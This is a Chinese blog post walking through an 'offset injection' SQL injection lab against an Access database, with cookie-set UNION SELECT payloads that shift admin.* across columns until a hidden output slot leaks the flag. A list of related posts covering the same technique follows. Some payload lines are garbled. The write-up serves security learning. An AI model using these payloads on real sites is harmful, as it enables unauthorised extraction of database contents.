适用于ACCESS和MySQL数据库的偏移注入

最新推荐文章于 2023-03-24 18:06:54 发布
最新推荐文章于 2023-03-24 18:06:54 发布
阅读量455 收藏
点赞数
分类专栏: 注入 文章标签: 偏移注入 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42097777/article/details/88957055
版权

## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此

# 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段

###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段
先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参
在这里插入图片描述
1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有注入点
2。order by 语句查询有几个字段,为了后面使用联合查询
例如,order by 26 显示正确,

等于27报错,判断为26个字段
在这里插入图片描述

3.使用union 联合查询 显错点,输出点
语句:
document.cookie=“id=”+escape(“104 +union +select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +from +admin”);“id=104”
在这里插入图片描述

4.发现了一个隐藏的输出点
语句:document.cookie=“id=”+escape(“104 +union +select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 +from +admin”);“id=104”
在这里插入图片描述
当前库名为security
5.挨着试查询表的字段数,用admin.代表查询表的所有字段,用联合查询依次试,不对在删除查询语句的一个列,直到正确页面显示
语句:document.cookie=“id=”+escape("104 +union +select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin. +from +admin");“id=104”
报错,再删一列

document.cookie=“id=”+escape(“104 +union +select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,admin.* +from +admin”);“id=104”
直到试出来
最后得到的字段数等于总长度26-还没删去的10列=16
在这里插入图片描述

6。查表的内容
不断偏移让输出点显示我们想要的信息,可以不断调整位置
语句:document.cookie=“id=”+escape(“104 +union +select 1,admin.,2,3,4,5,6,7,8,10,11 +from +admin")
在这里插入图片描述
没有得到我们想要的flag,继续偏移,变换位置
document.cookie=“id=”+escape("104 +union +select 1,2,3,4,5,6,7,8,admin.,10,11 +from +admin”
在这里插入图片描述

最终在隐藏显示位得到了我们想要的表内的信息:zkaq{f0e12dafb6},

liam liang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ACCESSMysql数据库的迁移
12-29
【从 ACCESSMySQL 数据库迁移的详细步骤】 在信息技术领域,数据库的迁移是一项常见的任务,特别是当系统规模扩大或需要更强大的性能时。本文主要介绍如何从 Microsoft Access 迁移到 MySQL 数据库,并以 ...
SQL注入偏移注入Access
秋水的博客
09-02 5172
注入简介 什么是偏移注入偏移注入是一种注入姿势,可以根据一个较多字段的表对一个少字段的表进行偏移注入,一般是联合查询,在页面有回显点的情况下 偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。 像Sqlmap之类的工具实际上是爆破...
Access数据库注入偏移注入
seek_2022的博客
05-02 2636
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
Access-偏移注入
weixin_45634365的博客
03-02 294
在SQL注入的时候会遇到一些无法查询列名的问题,例如系统自带数据库的权限不够而无法访问系统自带库,例如Access根本没有系统自带库,需要强行猜解表名 在猜到表名无法猜到字段名的情况下,可以使用偏移注入来查询表里面的数据 像sqlmap之类的工具实际上是爆破字段的名字,但是如果字段名比较奇怪,sqlmap就无能为力了 偏移注入终比较常用的方法是移位溢注 移位溢注 #假设admin表里面有id、username、password三个字段 #admin.*代表了admin表里所有的字段 select * fro
渗透测试基础-Access数据库偏移注入
weixin_45488495的博客
04-12 436
渗透测试基础-Access数据库偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
Access数据库--偏移注入
Y22Lee的博客
03-24 251
由于我的学习进度到了偏移注入,所以在网上也查找相关资料来查漏补缺填补我的不足,但是我发现我与网上的博主注入思路相差不大,区别在于他们大都使用了SQL 内连接函数 inner join帮助输出结果,下面是我的方法!对于Access数据库我上一篇的Access–cookie注入已经介绍过,偏移注入与cookie注入的方法和使用的函数部分相同。但是偏移注入的使用场景比它更加特殊偏移注入只需要爆破出任一表名,不需要知道任意字段名即可完成注入。a.偏移注入不只是针对Access数据库
探究JDBC连接AccessMySQL数据库.pdf
10-10
探究JDBC连接AccessMySQL数据库.pdf
JDBC连接AccessMySQL数据库分析与研究.pdf
10-10
JDBC(Java Database Connectivity)是Java编程语言中用于与各种类型数据库进行交互的标准API,它为开发者提供了一种统一的接口,使得Java程序可以轻松地访问各种关系型数据库,包括AccessMySQL。JDBC允许开发者...
php将access数据库转换到mysql数据库的方法
10-25
Access是一种小型、轻量级的数据库管理系统,而MySQL则是一款广泛使用的开源关系型数据库适用于大型网站和企业应用。在PHP环境下进行这种转换,通常涉及到数据读取、编码转换以及数据写入等步骤。 首先,我们需要...
report_test.zip_access mysql数据库查询
09-24
本话题聚焦于使用AccessMySQL进行数据库查询以及生成报表,最终实现数据的导出。Access是微软公司推出的一款关系型数据库管理系统(RDBMS),而MySQL则是一种广泛使用的开源、免费的SQL数据库系统。两者在数据处理...
access偏移注入
weiliang369的博客
02-22 1705
access偏移注入 利用情景 1.偏移注入access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。 2.用于解决判断出表名,得不到字段的困境。 偏移注入的特点 1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。 2.无需管理账号密码字段,直接爆账号密码。 利用条件 1.已知管理表名 2.已知任意字段(一个或多个多个会增加几率) 影响偏移注入成功率的因素 1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段
渗透————偏移注入
longger_lee
11-16 2042
偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。             偏移注入的流程:                  1,判断字段数。例如:order by 猜字段数为22                  2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)        
web安全入门(第五章-2)偏移注入
Yzz_的博客
06-02 454
一、偏移注入使用场景 早sql注入得时候会遇到一些无法查询列名得问题,比如系统自带数据库的 权限不够而无法访问系统自带库。 或者遇到Access数据库 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。 向sqlmap之类的工具实际上是爆破字段名的名字,但是如果字段名称比较奇葩,例如:H5scker_passwd 之类的那就无可奈何了。 总结: ~权限不够 ~遇到access数据库,且列名奇葩难爆破时 .* =>正则[匹配所有] .
Access——偏移注入
qq_45300786的博客
07-20 717
Access数据库没有系统自带库 =》只能强行猜解。 那有没有种方法,可以不知道字段名就查询数据呢。 这种方法就叫做偏移注入 既然如此我们在使用偏移注入之前要了解一些函数。 可以发现这三个查询语句时等价的, 第一个的 * 号,表示一切东西(表名,字段名) 第二个的*号,表示所有的字段名 直接开始 前面的内容是上一篇的access——cookie的内容,这里我就不多赘述。 判断回显位。 171+union+select+1%2c2%2c3%2c4%2c5%2c6%2c7%2c8%2c9%2c10+fr
SQL注入详解
m0_67391121的博客
07-28 3696
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
mysql偏移注入_偏移注入 - Michae1_('_')t - 博客园
weixin_42501119的博客
01-19 196
0x00:前言应用场景:Accessmysql数据库,知道表名,但是列名猜解不出来。偏移注入access比较独有的一种注入手段,很有特点(人品)的注入方式,一般用于在猜解了表名但是没有猜解出列名的情况下使用0x01:流程(1)注入点(2)判断字段数order by(3)判断显示位置union select 1,2,3,4,5,6...... from table注:还有隐性显位!例如:表面上只...
MYSQL偏移注入&部分知识点(一)
m0_63917373的博客
09-30 376
SQL注入(一) ACESSS MYSQL
Access注入--偏移注入
weixin_45922278的博客
10-17 267
Access注入--偏移注入 Access偏移注入:知道表名,不知道字段名. 核心:tables_name.* 题目:http://59.63.200.79:8004/ 1.http://59.63.200.79:8004/ProductShow.asp?id=104 #去除id=104,通过cookie传参 #http://59.63.200.79:8004/...
access数据库mysql数据库有什么区别
最新发布
06-07
2. Access适用于小型应用程序和个人使用,而MySQL适用于大型企业级应用程序和Web应用程序。 3. Access使用Jet数据库引擎,而MySQL使用自己的数据库引擎。 4. Access支持多用户访问,但是在多用户环境下,性能可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值